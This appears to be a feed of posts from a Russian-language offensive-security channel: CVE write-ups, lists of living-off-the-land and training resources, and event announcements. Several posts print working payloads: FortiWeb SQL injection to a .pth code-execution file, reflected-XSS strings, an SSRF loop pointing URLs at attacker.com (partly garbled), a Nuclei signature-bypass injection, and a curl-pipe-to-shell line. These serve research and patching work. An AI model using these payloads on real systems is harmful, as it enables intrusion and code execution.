PurpleBear

14 July 2025 15:30

Pre-Auth SQL Injection to RCE - Fortinet FortiWeb Fabric Connector

Опубликованы технические детали и эксплоит для уязвимости CVE-2025-25257 (оценка по CVSSv3=9.6) в компоненте экосистемы Fortinet, именуемом FortiWeb Fabric Connector😜 Который обеспечивает автоматизированное взаимодействие между различными компонентами (FortiWeb WAF, FortiGate NGFW, FortiManager, FortiWhatever) согласно описанию продуктовой линейки Fortinet.

По сути это классическая SQL-инъекция в функции get_fabric_user_by_token, которая обеспечивает аутентификацию для различных интеграций с FortiWeb API. Эта функция передает контролируемый атакующим char *a1 инпут в заголовок Authorization: Bearer %128s на эти ручки:

GET /api/fabric/device/status HTTP/1.1
GET /api/v[0-9]/fabric/widget/[a-z]+
GET /api/v[0-9]/fabric/widget
Host: fortiweb_ip
Authorization: Bearer AAAAAA'or'1'='1

Далее не менее классический способ RCE в MySQL через INTO OUTFILE неожиданно запущенном от root🙈 А именно загрузка веб-шелла в cgi-bin веб-сервера Apache с хитрым трюком обхода ограничений запрета на перезапись исполняемых файлов через эту технику из исследования SonarSource:

Python supports a feature called site-specific configuration hooks. Its main purpose is to add custom paths to the module search path. To do this, a .pth file with an arbitrary name can be put in the .local/lib/pythonX.Y/site-packages/ folder in a user's home directory:
'/**/or/**/1=1/**/UNION/**/SELECT/**/'import os;os.system(\\'ls\\')'/**/into/**/outfile/**/'/var/log/lib/python3.10/site-packages/trigger.pth

И обходом ограничения на 128-character limit в заголовке Authorization: Bearer
'/**/UNION/**/SELECT/**/token/**/from/**/fabric_user.user_table/**/into/**/outfile/**/'../../lib/python3.10/site-packages/x.pth'

Таким образом, получаем прекрасный отчет от исследователей из watchTowr с наглядным и понятным описанием технической эксплуатации уязвимостей с нотками тонкой иронии и интересным трюком, который можно взять на вооружение👍

⚙️ POC: https://github.com/watchtowrlabs/watchTowr-vs-FortiWeb-CVE-2025-25257
🪲 Уязвимые версии ПО: FortiWeb 7.6.0 до 7.6.3, FortiWeb 7.4.0 до 7.4.7, FortiWeb 7.2.0 до 7.2.10, FortiWeb 7.0.0 до 7.0.10
✅ Рекомендации: Необходимо обновиться до последних актуальных версий

PurpleBear

01 July 2025 15:39

Оhmymalware

James Spiteri - автор одноименного ohmymalware">youtube-канала создал ресурс, который представляет собой лабораторное окружение в веб-интерфейсе, позволяющее досконально разобрать алерты на семплы ВПО с Virustotal, используемого различными APT-группировками во время кампаний в дикой природе.

В качестве SIEM в лабах используется коммерческая версия Elastic Security с дефолтными правилами, в роли агента - бесплатный Elastic Agent + Fleet в качестве оркестратора агентов и Elastic Defend в роли AI-driven🤖 EDR

Кейсы:
𝐄𝐏𝟏 — Sofacy / Fancy Bear (APT28)
🎯 𝐖𝐢𝐧𝐝𝐨𝐰𝐬 | 𝐌𝐚𝐥𝐰𝐚𝐫𝐞 | 𝐏𝐡𝐢𝐬𝐡𝐢𝐧𝐠
𝐄𝐏𝟐 — REvil / Sodinokibi (GOLD SOUTHFIELD)
🎯 𝐖𝐢𝐧𝐝𝐨𝐰𝐬 | 𝐑𝐚𝐧𝐬𝐨𝐦𝐰𝐚𝐫𝐞 | 𝐒𝐮𝐩𝐩𝐥𝐲 𝐂𝐡𝐚𝐢𝐧
𝐄𝐏𝟑 — Emotet
🎯 𝐖𝐢𝐧𝐝𝐨𝐰𝐬 | 𝐌𝐚𝐥𝐰𝐚𝐫𝐞 | 𝐏𝐡𝐢𝐬𝐡𝐢𝐧𝐠
𝐄𝐏𝟒 — QBot (Qakbot)
🎯 𝐖𝐢𝐧𝐝𝐨𝐰𝐬 | 𝐌𝐚𝐥𝐰𝐚𝐫𝐞 | 𝐏𝐡𝐢𝐬𝐡𝐢𝐧𝐠
𝐄𝐏𝟓 — BPFDoor
🎯 𝐋𝐢𝐧𝐮𝐱 | 𝐌𝐚𝐥𝐰𝐚𝐫𝐞 | 𝐏𝐞𝐫𝐬𝐢𝐬𝐭𝐞𝐧𝐜𝐞
𝐄𝐏𝟔 — Bumblebee Loader
🎯 𝐖𝐢𝐧𝐝𝐨𝐰𝐬 | 𝐌𝐚𝐥𝐰𝐚𝐫𝐞 | 𝐏𝐡𝐢𝐬𝐡𝐢𝐧𝐠
𝐄𝐏𝟕 — OilRig
🎯 𝐖𝐢𝐧𝐝𝐨𝐰𝐬 | 𝐃𝐍𝐒 𝐄𝐱𝐟𝐢𝐥𝐭𝐫𝐚𝐭𝐢𝐨𝐧 | 𝐏𝐡𝐢𝐬𝐡𝐢𝐧𝐠
𝐄𝐏𝟖 — AMOS (Atomic macOS Stealer)
🎯 𝐦𝐚𝐜𝐎𝐒 | 𝐌𝐚𝐥𝐰𝐚𝐫𝐞 | 𝐒𝐭𝐞𝐚𝐥𝐞𝐫

Каждый кейс сопровождается детальным разбором в формате видео-ролика с детонацией семпла в режимах detection mode и prevention mode и ссылками на семплы с Virustotal. И не смотря на то, что рассматриваемые решения сможет себе позволить далеко не каждая компания, учитывая стоимость и особенности лицензирования - это все равно будет полезно, чтобы наглядно оценить их функциональность, а также сам процесс разбора алерта аналитиками дежурной смены в теории.

К тому же, можно использовать эти же семплы на лабораторном стенде другого вашего SIEM в формате киберучений, чтобы быть уверенными, что существующие правила полностью покрывают техники злоумышленников, а созданные процессы по триажу алертов не требуют оптимизации и работают как часы👍

PurpleBear

27 June 2025 17:00

🎉 Результаты розыгрыша:

🏆 Победители:
1. Empty (@xor_esp_esp)
2. Benjamin Legrand
3. CyberGreg (@CyberGreg05)
4. coldwave (@coldw4ve)
5. Over (@elviacro)

✔️Проверить результаты

PurpleBear

09 June 2025 11:44

Всем привет!
В процессе подготовки одной презентации собирал список ресурсов с описанием Living off the land (LotL) техник атакующих, которым хотел бы поделиться в этой заметке:

🔴 LOLBAS
Список бинарных файлов, скриптов и библиотек, для реализации LotL техник
🔴 GTFOBins
Список бинарных файлов Unix, которые можно использовать для обхода локальных ограничений безопасности в неправильно сконфигурированных системах
🔴 LOOBins
Консолидированный список built-in macOS утилит с подробным описанием
🔴 GTFOArgs
Список бинарных файлов Unix, аргументы которых можно использовать для реализации LotL техник
🔴 LOTTunnels
Консолидированный список различных инструментов для туннелирования трафика, которые используются злоумышленниками для обеспечения доступа и извлечения информации
🔴 LOLDrivers
Список драйверов Windows, которые активно используются в дикой природе
🔴 LOLApps
Небольшой список built-in and third-party приложений для Windows и Linux для реализации LotL техник
🔴 LOLESXI
Список бинарей и скриптов доступных по дефолту в VMware ESXi, которые можно использовать для реализации LotL техник
🔴 LOLCerts
Список утекших code signing сертификатов, которые активно используются в дикой природе
🔴 LOLAD
Список AD’s built-in tools с командами и детальным описанием реализации LotL техник
🔴 LOTS
Список ресурсов, используемых для создания атакующей инфраструктуры (фишинг, С2, эксфильтрация)
🔴 MalAPI
Корреляция вызовов Windows API с техниками, используемыми вредоносным ПО в дикой природе
🔴 FileExtension
Список расширений файлов, которые используются для доставки полезной нагрузки
🔴 Bootloaders
Список вредоносных загрузчиков для различных ОС, которые используются в дикой природе со ссылками на IOC и правила обнаружения (YARA, Sigma)

Я уверен, что этот список далеко не полный, поэтому если знаете еще LotL ресурсы, очень прошу поделиться в комментариях к этому посту🙏

PS: Желаю всем хорошего понедельника и удачной короткой недели!

PurpleBear

03 June 2025 15:25

🔒 4 июня в 11:00 на AM Live: Как противостоять целевым атакам в 2025 году

Вектор угроз постоянно меняется: от фишинга и социальной инженерии — к атакам на цепочку поставок, вовлечению инсайдеров и разработке кастомного ПО.

❗ Как в таких условиях выстраивать устойчивую защиту? ❗ Можно ли полагаться только на отечественные технологии? ❗ И какие инструменты действительно работают — без маркетинга?

💡 В эфире AM Live: — Анализ свежих кейсов целевых атак в России; — Что делать, если под ударом — инфраструктура, финансы или данные клиентов; — Эффективность XDR, песочниц, Deception, Threat Intelligence и SOC; — Как строить процессы обнаружения и реагирования, какие решения приносят результат, а какие — нет.

🔗 Регистрируйтесь по ссылке, подключайтесь и будьте готовы к честному разговору о безопасности — без иллюзий и «волшебных кнопок».

#AMLive #ИБ #Киберугрозы #APT #ЦелевыеАтаки #XDR #ThreatIntelligence #SOC #Deception

PurpleBear

30 May 2025 11:32

Всем привет!
После небольшого перерыва возвращаюсь с регулярными постами и сегодня мы поговорим про...Reflected XSS😂

В качестве предисловия, среди аудитории канала большое количество матерых пентестеров и баг-хантеров, но и много новичков, которые только начинают свой путь в нашей отрасли и этот пост в большей степени для них, так как все когда-то учились. Да и в целом практически каждое техническое интервью я предпочитаю начинать с вопросов про XSS, только контекст обычно зависит от грейда кандидата.
Вообще XSS-кам, как классу уязвимостей предcказывали быструю смерть еще в 2014, когда Content Security Policy 2.0 стал фактически стандартом, но в классификации OWASP-10 от 2021 года XSS уверенно удерживает 3-е место на ряду с другими инъекциям, посмотрим как ситуация изменится в этом году.

💥Таким образом XSS:
✅ Распространенная уязвимость
✅ Дает серьезный импакт в определенных условиях
✅ Автоматизация поиска и эксплуатации

❓Как искать?
✅ Собираем все url'ы с параметрами ((?q=, ?id=, и тд) с помощью:
🔧 Paramspider - использует web.archive.org для поиска url доменов из списка
paramspider -l targets.txt
🔧 Gospider - довольно быстрый веб краулер на Go
gospider -S targets.txt -a -w -r --js --sitemap --robots -d 2 -c 10 -t 20 -K 10 \
--blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|svg|js|dat|pdf|webp|woff|woff2|tif|ttf|tiff2)" \
-q | tee gospider-out.txt
✅ Объединяем и сортируем выхлопы в один файлик:
cd paramspider/output
cat *.txt > paramspider_out.txt
cat paramspider_out.txt | sort -u | tee tragets_url.txt
✅ Определяем живые хосты с помощью httpx
httpx -l tragets_url.txt --threads 250 -o live_tragets_url.txt
✅ Сортируем выхлоп по расширениям:
cat live_tragets_url.txt | grep -i -e '\.php$' | tee live_tragets_url_php.txt
cat live_tragets_url.txt | grep -i -e '\.asp$' | tee live_tragets_url_asp.txt
cat live_tragets_url.txt | grep -i -e '\.aspx$' | tee live_tragets_url_aspx.txt
cat live_tragets_url.txt | grep -i -e '\.jsp$' | tee live_tragets_url_jsp.txt
cat live_tragets_url.txt | grep -i -e '\.do$' | tee live_tragets_url_do.txt
✅ Ищем отраженные параметры с помощью:
🔧 Dalfox
dalfox file live_tragets_url_jsp.txt --skip-xss-scanning -o live_tragets_url_jsp_reflecting.txt
✅ Определяем отраженный контекст:
🔖 Reflected Between HTML Tags
<p>"><zxcvbro>Bro</p>
🔧 Используем полезную нагрузку:
<img src=x onerror=prompt(1)>
<details open ontoggle=prompt(origin)>
<svg onload=confirm(1)>
🔐 Reflected Inside HTML Tag Attributes
<input value="><zxcvbro>Bro">
🔧 Используем полезную нагрузку:
" autofocus onfocus=alert(document.domain) x="
"><script>alert(1)</script>
📜 Reflected Inside JavaScript
<script>
var input = '"><zxcvbro>Bro';
</script>
🔧 Используем полезную нагрузку:
';alert(1)//
'-alert(1)-'
</script><img src=1 onerror=alert(1)>
✅ Сдаем багу
✅ Вы великолепны💸

PurpleBear

02 April 2025 11:09

Недавно мне попался интересный проект AttackRuleMap, который представляет собой маппинг тест-кейсов инструмента Atomic Red Team и соответствующих правил обнаружения в формате Sigma. Данный ресурс может быть очень полезен, чтобы обеспечить покрытие алертами большей части техник MITRE, особенно на ранних этапах уровня зрелости команды Detection Engineering.

Но далеко не все SIEM из коробки поддерживают этот универсальный формат для пра­вил обнаружения, поэтому если у вас в компании изпользуется, например Elastic SIEM, то потребуется конвертировать правила в KQL (Kibana Query Language) и EQL (Event Query Language).

Реализовать данную задачу можно с помощью pySigma и Sigma CLI, которые пришли на смену Sigmac. Раньше был еще онлайн-конвертер uncoder.io (на данный момент ресурс по какой-то причине лежит🤷‍♂️), который позволял просто в веб-интерфейсе конвертировать Sigma правила для выбранного SIEM (включая Elastic KQL, Elastic EQL).
При этом существуют некоторые недостатки связанные с конвертацией правил, которые описаны в этой статье.

Но тем не менее, мне кажется, это хорошая отправная точка для старта, когда в первую очередь необходимо обеспечить максимально возможное покрытие стандартных техник и процедур злоумышленников в короткие сроки😎

PurpleBear

20 March 2025 10:43

Всем привет!
Небольшая заметка про поиск SSRF и Open Redirect😁 в составе пайплайнов автоматизации

waybackurls target.com | grep -E "/https?://|=https?://|=/.*" | while read url; do random=(opensslrand−base646∣tr−d ′ /+ ′ );murl=(echo $url | sed -E "s/(/|=)(https?://[^/&?]+)/\1http://attacker.com/$random/g;s/=/[^&]+/=http://attacker.com/$random/g") && echo "Requesting: $murl" && curl -so /dev/null --connect-timeout 5 "$murl"; done

🔴Этот bash скрипт использует утилиту waybackurls, чтобы получить список всех известных url для заданного домена target.com из архива Wayback Machine.
🔴 Фильтрует полученные url c помощью регулярки, оставляя только потенциально уязвимые, которые содержат:
/https://example.com, ?url=http://example.com и ?url=/example
🔴 Для каждого url из списка генерирует случайную строку длиной 6 символов с помощью openssl rand, заворачивает в base64 и удаляет символы / и + на выходе получается что-то такое -a1b2c3
🔴 Модифицирует каждый url, заменяя:
http://example.com на /http://attacker.com/random.
http://example.com на =http://attacker.com/random.
/example на =http://attacker.com/random
🔴 Выводит в консоль модифицированный url перед отправкой запроса либо сохраняет в файл echo "$(date '+%Y-%m-%d %H:%M:%S') Requesting: $murl" | tee -a log.txt
🔴 Отправляет запросы с помощью curl c ограничением время ответа 5 сек, чтобы логировать статус коды ответов можно добавить:
http_code=$(curl -so /dev/null --connect-timeout 5 -w "%{http_code}" "$murl")
echo "$(date '+%Y-%m-%d %H:%M:%S') Response [$http_code] from: $murl" >> responses.txt

В качестве сервера атакующего, чтобы ловить отстуки можно использовать что угодно, начиная от Burp Collaborator до interactsh на своем домене.

PurpleBear

19 February 2025 08:46

One LLM chat to rule them all

Использование больших языковых моделей в наши дни уже стало привычной рутиной для большинства людей во многих областях деятельности. Регулярно появляются новые модели с новой функциональностью, на примере с DeepSeek R1 спровоцировавшей панику на фондовом рынке в конце января. Мне как и думаю большинству из вас тогда сразу же захотелось ее потестировать, чтобы заставить бездушную машину поразмышлять о смысле жизни, будущем атакующей кибербезопасности и о том как Алексей Лукацкий может писать столько постов в своем канале🤠 а также других риторических вопросах.

Представляю вашему вниманию небольшой обзор двух достойных приложений с LLM чатами в веб-интерфейсе с открытым исходным, которые можно развернуть самостоятельно и значительно увеличить потенциал использования больших языковых моделей. А дочитав до конца вы узнаете, как получить в свое распоряжение API для более 100 различных моделей абсолютно бесплатно😎

PurpleBear

04 February 2025 09:27

Living Off The Tunnels

В полку Living Off The Land очередное пополнение - LOTTunnels, консолидированный список различных инструментов для туннелирования трафика, которые используются злоумышленниками для обеспечения доступа и извлечения информации во время кибератак.

На данный момент список включает всего 22 инструмента, но есть некоторые ранее незнакомые🙈
Ну и как community driven проект LOTTunnels будет дальше развиваться с помощью контрибьюторов. В описании утилит есть читшит, референсы и начальные методы обнаружения, лично мне не хватает только прайса и условий использования.

В любом случае это хорошая возможность включить новые инструменты в качестве тест-кейсов в сценарии киберучений в формате Purple Teaming😎

PurpleBear

24 January 2025 10:49

Backdooring Your Backdoors - Another $20 Domain, More Governments

Интересный ресерч от watchTowr из серии "hackers hacking hackers". В ходе исследования были проанализированы исходники различных веб-шеллов с открытым исходным кодом и обнаружены некоторые закладки недокументированные особенности😎 Например, некоторые возможно вспомнят историю с бэкдором в веб-шелле c99shcook, который сливал логопасы разработчику. Исследователи пошли дальше и зарегали на себя просроченные домены (40+), на которые отстукивались различные веб-шеллы и начали анализировать полученные доступы данные телеметрии😎

Результаты анализа включают около 4000 взломанных веб-серверов, в том числе несколько ресурсов в доменной зоне .gov, на которые заливались различные веб-шеллы🙈

В целом ничего нового и так было всегда, но заставляет задуматься о вечном том, что мы как security профессионалы по умолчанию обязаны читать исходники любых opensource инструментов, которые используем в инфраструктуре заказчиков. Но ведь иногда бывают ситуации, когда проверенного инструмента просто нет под рукой и необходимо принести его с гитхаба из репозитория уважаемого автора offensive утилит.

Например, поставьте лайк👍 если когда-нибудь делали так:
curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh

Автор linpeas в прошлом году проводил эксперимент и просто по фану в рамках повышения осведомленности временно добавил в свой скрипт сбор телеметрии, где именно используется его инструмент, подробности и скриншоты будут в комментариях.

PS: Желаю всем удачного завершения рабочей недели и хороших выходных!

PurpleBear

09 January 2025 08:10

CVE-2024-43405 - Nuclei's template signature verification bypass

Начнем первый рабочий день с обзора уязвимости CVE-2024-43405 (оценка по CVSS=7.8) в Nuclei, которая может привести к RCE на сервере сканера. С версии Nuclei 3.0 появилась возможность выполнения кода на хостовой ОС с помощью code protocol, что позволяет создавать шаблоны с более сложной логикой и существенно расширяет возможности сканера. В этом же релизе была анонсирована возможность подписывать и проверять темплейты. Суть данной уязвимости в возможности обхода этого механизма для добавления вредоносного кода и его выполнении из подписанного шаблона.

Относительно технических деталей, опубликованных в блоге исследователей из Wiz, уязвимость возникает из-за неправильной интерпретации управляющих символов \r\n используемыми парсерами. Для парсинга YAML содержимого темплейта используется библиотека gopkg.in/yaml.v2, которая интерпретирует x0A (\n), x0D (\r) или комбинацию (\r\n) как конец строки. А механизм проверки подписи использует regex (?m)^#\\sdigest:\s.+$ для проверки подписи после # digest:

А так как логика для проверки подписи предполагает, что проверяется только первое вхождение и символы \\r будут интерпретироваться regex парсером как часть строки, а YAML парсер будет считать их указанием на перенос строки🙈 а механизм проверки перед подсчетом хеша удаляет все строки с # digest: поэтому можно вставить вредоносный код во второе вхождение и он успешно пройдет проверку и будет выполнен:

# digest: <valid-signature>
# digest: <injected-signature>\rcode:\r\r engine:\r - sh\r source: |\r echo "This is injected and executed!" > /tmp/payload.txt

Таким образом, обновляемся до версии Nuclei 3.3.2 и выше, а лучше вообще никогда не используем чужие темплейты без дополнительной верификации содержимого, особенно если это всякие агрегаторы сommunity темплейтов😁

PurpleBear

28 December 2024 18:02

PurpleBear 2024 ➡️ PurpleBear 2025

Итоги уходящего года хочу традиционно начать со слов благодарности всем читателям❤️

От души благодарю каждого из Вас, особенно большое спасибо всем кто лайкал, делился и комментировал, именно благодаря вашей поддержке канал развивается, нас уже более 3500 человек🎉

В 2025 году готовим для Вас кое-что интересное...

Желаю всем хорошего окончания года и веселой предпраздничной суеты🎄

PurpleBear

23 December 2024 08:25

Всем привет!
Летом у нас была подборка по self-hosted лабораторным окружениям, сегодня предлагаю вашему вниманию список различных ресурсов позволяющих совершенствовать навыки по различным доменам знаний атакующих и защитников в онлайн формате:

☑️ HackTheBox - https://www.hackthebox.com
☑️ Standoff365 - https://range.standoff365.com/
☑️ Try Hack Me - https://tryhackme.com
☑️ Defbox - https://defbox.io/
☑️ Attack-Defense - https://attackdefense.com
☑️ Alert to win - https://alf.nu/alert1
☑️ CryptoHack - https://cryptohack.org/
☑️ CMD Challenge - https://cmdchallenge.com
☑️ Cyberdefenders - https://cyberdefenders.org/blueteam-ctf-challenges/
☑️ Defend The Web - https://defendtheweb.net/
☑️ Exploitation Education - https://exploit.education
☑️ Google CTF - https://capturetheflag.withgoogle.com/
☑️ Hacker101 - https://ctf.hacker101.com
☑️ Hacking-Lab - https://hacking-lab.com/
☑️ ImmersiveLabs - https://immersivelabs.com
☑️ Infinity Learning CWL - https://cyberwarfare.live/infinity-learning/
☑️ LetsDefend- https://letsdefend.io/
☑️ NewbieContest - https://www.newbiecontest.org/
☑️ OverTheWire - http://overthewire.org
☑️ Pentesterlab - https://pentesterlab.com
☑️ PentestIT LAB - https://lab.pentestit.ru
☑️ PicoCTF - https://picoctf.com
☑️ PWNABLE - https://pwnable.kr/play.php
☑️ Root-Me - https://www.root-me.org
☑️ SANS Holiday hack - https://www.sans.org/mlp/holiday-hack-challenge-2024
☑️ SmashTheStack - https://www.smashthestack.org/main.html
☑️ The Cryptopals Crypto Challenges - https://cryptopals.com
☑️ Vulnhub - https://www.vulnhub.com
☑️ Vulnmachine - https://www.vulnmachines.com/
☑️ W3Challs - https://w3challs.com
☑️ Websploit - https://websploit.org/
☑️ Zenk-Security - https://www.zenk-security.com/

PurpleBear

16 December 2024 14:32

Теперь немного про суть доклада.

- запись
- презентация
- описание

В безопасности мы часто сталкиваемся с задачами, которые на первый взгляд кажутся сложными. Но многие из них можно решить просто (относительно), если подойти к ним с правильной стороны. Возможно, тут дело в том, что мы, как инженеры, часто уходим в оверинжиниринг, кто знает…

Я неоднократно сталкивался с проектами, которые приходилось переосмысливать и перезапускать по несколько раз. Почему так происходит?
Дело в том, что невозможно предвидеть все проблемы на старте:
• технические ограничения могут проявиться только в процессе реализации
• бизнес-модель может измениться
• (что-угодно, вставь свое)

Если у вас всегда получается сделать все с первого раза - научите :))

Но важно не переступить грань и не перейти в фазу постоянно перезапускающихся проектов, все-таки мы тут, чтобы делать дела.

По итогам доклада хочется выделить две мысли.

Гибкость мышления. В условиях переменчивого мира и ограниченных ресурсов нам критически важно сохранять открытость ума. Нельзя зацикливаться на одном решении, подходе, практиках. Очень важно:
1. уметь проводить аналогии между проблемами ИБ и общими задачами IT + это поможет увидеть, как можно адаптировать решения IT под решение задач ИБ
2. иметь широкий взгляд на вещи, позволяющий увидеть нестандартные решения

Парадокс простоты. Интересно, что первое «простое», как нам кажется, решение обычно оказывается совсем не простым. А найти простое решение сложной проблемы зачастую бывает очень даже непросто. Это требует:
• глубокого понимания сути проблемы
• креативного подхода к поиску решений
• готовности отбросить привычные шаблоны мышления
• высокого уровня общей эрудиции

Нам надо стремиться к простоте. Постепенно совершенствуя наши процессы и подходы, мы можем находить эти упрощения. Простота позволит нам эффективнее решать наши задачи, концентрируя усилия на новых вызовах.

Илон Макс делился примером эволюции двигателя Raptor. Лучше один раз увидеть, чем 10 раз читать.

PurpleBear

03 July 2025 19:13

Давно не виделись. Пора наконец-то собраться! 🔥

Конференция по практическим аспектам ИБ ZeroNights возвращается после перерыва и готова к покорению вершин кибербезопасности с новыми силами и неизменной преданностью своим традициям.

👾 Дата: 26 ноября 2025
👾 Место: Санкт-Петербург, LOFT HALL #7

ZeroNights пройдет в одиннадцатый раз! В этом году мы вновь собираем всех единомышленников из сферы информационной безопасности, чтобы возобновить то, что вы так любите — профессиональное комьюнити, тематические доклады, обсуждения актуальных тем сферы кибербезопасности. 

Будем на связи: zeronights.ru
Совсем скоро откроем прием заявок на доклады!

PurpleBear

27 June 2025 17:14

Поздравляю победителей🎉
В ближайщее свяжусь со всеми в ЛС✍️

PS: Желаю всем отличного вечера пятницы и удачных выходных!

PurpleBear

23 June 2025 15:15

Мои хорошие друзья из Лаборатории Касперского анонсировали Offensive Meetup #4

Это community-driven мероприятие для специалистов в области атакующей информационной безопасности, на котором вас ждет:
🔴 Ламповая атмосфера одного из московских баров
🔴 Крутые доклады от экспертов из нашей отрасли
🔴 Закуски, напитки и классный мерч, который можно получить за участие в различных активностях
🔴 Нетворкинг, общение и просто хорошее настроение

Мероприятие традиционно приватное, записей не будет, вход только по персональным приглашениям.

Но есть 5 проходок, которые мы разыграем. Условия простые, необходимо просто заломать пентагон подписаться на каналы @assume_birch и @purple_medved и нажать кнопку Участвовать, а победителей определит рандом 27.06 в 18:00

📆 10 июля, 18:30
📍Москва, точная локация будет указана в персональном приглашении

PurpleBear

05 June 2025 11:32

Всем привет!
Запись прямого эфира AM Live на тему "Целевые атаки 2025: как защитить бизнес?" доступна по ссылке.

Мы с коллегами по отрасли говорили о том, в каких реалиях сейчас живут крупные компании, госсекторы, ИТ и критическая инфраструктура:
🔸 Как выглядят целевые атаки сегодня:
— Почему массовые фишинговые рассылки уступают место точечным сценариям;
— Рост атак на цепочку поставок и вовлечение инсайдеров;
— Громкие кейсы 2024–2025 годов — и чему они нас научили.

🔸 Кто под прицелом в 2025 году:
— Госструктуры, ТЭК, банки, ИТ и телеком — но теперь всё чаще под ударом и «обычный» крупный бизнес;
— Что мотивирует атакующих: политика, деньги, идеология.

🔸 Какие технологии реально работают:
— XDR, песочницы, deception-системы, Threat Intelligence, MITRE ATT&CK;
— Почему важно понимать реальную эффективность SOC, а не просто «галочку» в отчёте;
— Где заканчивается маркетинг и начинается реальная защита.

PS: Это был мой дебютный эфир в роли модератора, поэтому буду очень признателен за лайки, комментарии и конструктивную критику🙏

PurpleBear

30 May 2025 13:08

Мои хорошие друзья из компании Luntry в этом году проводят уже 3-ю конференцию БеКон, полностью посвященную безопасности контейнеров👏

Контейнеризация давно стала стандартом, но как с ней жить безопасно — знают не только лишь все далеко не все.

На БеКон:
🔸 Разбираются лучшие практики DevSecOps, ShiftLeft и Zero Trust без маркетинга и розовых очков.
🔸 Обсуждаются настоящие кейсы: что сломалось, как починили, и стоит ли так делать снова.
🔸 Выступают инженеры, которые сами пишут код, собирают инфраструктуру и отвечают за безопасность.
🔸 Нетворкинг и возможность общения с единомышленниками на темы безопаности кубов.
🔸 Мерч, стенды партнеров конференции и многое другое.

📆 3 июня, 09:00-18:30
📍 Москва, LOFT HALL#2

Мы с командой будем на БеКон, поэтому буду рад встретиться и пообщаться со всеми кто планирует окунуться в тему безопасности контейнеров📈

PurpleBear

29 April 2025 12:08

Vaultwarden - Improper access control (CVE‑2025‑24364) и RCE (CVE‑2025‑24365)

Буквально вчера, крутой ресерчер Елизар Батин из BI.ZONE опубликовал технические детали 2-ух уязвимостей найденных в рамках исследования Vaultwarden. Это очень популярная реализация сервера Bitwarden с открытым исходным кодом, совместимая с официальными клиентами этого парольного менеджера, которая согласно статистики компании BI.ZONE используется в 10% всех компаний в нашей стране.

CVE‑2025‑24364 (оценка по CVSS=7.2)
Ролевая модель решения предусматривает доступ к секретам в рамках понятия Organization, т.е пользователи состоящие в определенной Организации имеют доступ только к соответствующим ей секретам. Суть уязвимости заключается в повышении привилегий пользователя до админа Организации с доступом ко всем секретам по причине некорректной логики функции Request Guard, используемой для проверки принадлежности конкретного пользователя к UUID конкретной Organization. Детали эксплуатации подробно описаны в блоге😎

CVE‑2025‑24365 (оценка по CVSS=8.1)
RCE на сервере Vaultwarden через доступ к веб-интерфейсу панели администратора. Эксплуатация заключается в возможности использовать команду для отправки SMTP-сообщений с помощью Sendmail, чтобы запустить пейлоад через bin/sh.
Дальше мне очень понравилось, сначала меняем путь до icon_cache_folder на подконтрольный атакующему сервер с пейлоадом в метаданных PNG. Vaultwarden сходит за новой иконкой и сохранит ее в /@icon/attacker-site.com.png
Далее подставляем абсолютный путь до нашего пейлоада в поле From Address и отправляем сообщение, которое выполнит нашу полезную нагрузку.

Таким образом, получается интересный вектор для Vaultwarden. Относительно рекомендаций, в первую очередь необходимо обновиться до версии 1.33.0 и далее отключить неиспользуемую функциональность приложения, как рекомендует автор уязвимостей.

PurpleBear

31 March 2025 17:47

Всем привет!
Если этот пост опубликуется, значит канал разблокировали🎉

Хотел сказать огромное спасибо всем кто помог с решением вопроса и просто приходил в личку со словами поддержки🙏

PurpleBear

03 March 2025 15:02

The future of security testing: harness AI-Powered Extensibility in Burp

В прошлом месяце Portswigger анонсировали поддержку AI-powered расширений для Burp Suite. По капотом как и положено используется Montoya API, который выпустили в 2022 году на смену устаревшему Burp Extender API (2005 год).

Взаимодействие с AI моделью реализовано через этот интерфейс, что позволяет разработчикам сосредоточиться на функциональности расширений, а не думать как подружить свое решение с API провайдера LLM, но ограничивает в выборе конкретной модели и придется платить Portswigger чтобы покупать токены. По дефолту каждому пользователю Pro версии доступно 10,000 free AI credits. Ну и существуют некоторые опасения относительно конфиденциальности данных, которые отправляются модели, которые авторы попробовали развеять в этой статье.

На данный момент в BApp Store доступны всего несколько AI-powered расширений:
☑️ AI HTTP Analyzer (для Pro версии)
☑️ Hackvertor c AI функциональностью (для Community версии)

И есть еще Bounty Prompt, который позволяет подключить в качестве модели любую из поддерживаемых Groq Cloud с помощью универсального API.

Для того чтобы поиграться самостоятельно нужен релиз версии Early Adopter 2025.2, который можно переключить в Settings ➡️ Suite ➡️ Updates ➡️ Channel: Early Adopter, но уже в этом месяце поддержка AI-powered расширений появиться в версии Stable.

Как вы думаете, таким образом, скайнет💀 подбирается все ближе или такая автоматизация рутины освободит нам время для более творческих задач? Оставляйте свое мнение в комментариях🙏

PurpleBear

10 February 2025 08:28

Hacking Subaru: Tracking and Controlling Cars via the STARLINK Admin Panel

Пару недель назад легендарный исследователь Sam Curry опубликовал детали своего очередного ресерча, на этот раз под раздачу попали автомобили Subaru😎 Найденные баги позволяют открывать и заводить любой автомобиль удаленно, получать доступ к истории перемещений за последний год, получать доступ к личным данным (PII) владельцев и прочее.

Суть эксплуатации заключалась в реализации Account Takeover для служебного портала STARLINK, который является интерфейсом управления Subaru’s in-vehicle infotainment system, позволяющим сотрудникам компании удаленно управлять автомобилем (открывать/закрывать, включать/выключать зажигание)...через интернет🙈 С помощью перебора файлов в директории /assets/_js/ веб-сервера, был найден login.js, раскрывающий "особенности" функциональности сброса пароля, для которой достаточно отправить значение логина (email сотрудника) и новый пароль. Валидные почтовые аккаунты можно было энумерейтить через ручку /adminProfile/getSecurityQuestion.json?email=example@example.com которая возвращала секретные вопросы если аккаунт существует. Дальше был фееричный байпасс якобы 2FA, реализованного client-side через диалоговое окно HTMLDialogElement методом showModal()🤯
Таким образом можно было угнать/отслеживать любой автомобиль Subaru на территории США, Канады и Японии, уязвимости были устранены в течение 1 дня после репорта исследователя👍

По факту практически любой современный автомобиль представляет собой компьютер на колесах с кучей интеграций с различными сервисами производителя и если раньше для поиска критичных узявимостей был необходим физический доступ к самой машине, осциллограф, навыки автоэлектрики и механники, то сейчас вполне достаточно просто доступа к интернету, Burp'a и желания сделать свой автомобиль более безопасным🔥

PurpleBear

27 January 2025 10:13

Penetration Tester в Wildberries
ЗП: до 450 000 рублей net
Уровень: Senior
Формат: удаленка или гибрид

Мы в поиске новых тиммейтов в APT Wildbears💜

💫 Чем предстоит заниматься:
• Проведение проектов по анализу защищенности веб и мобильных приложений
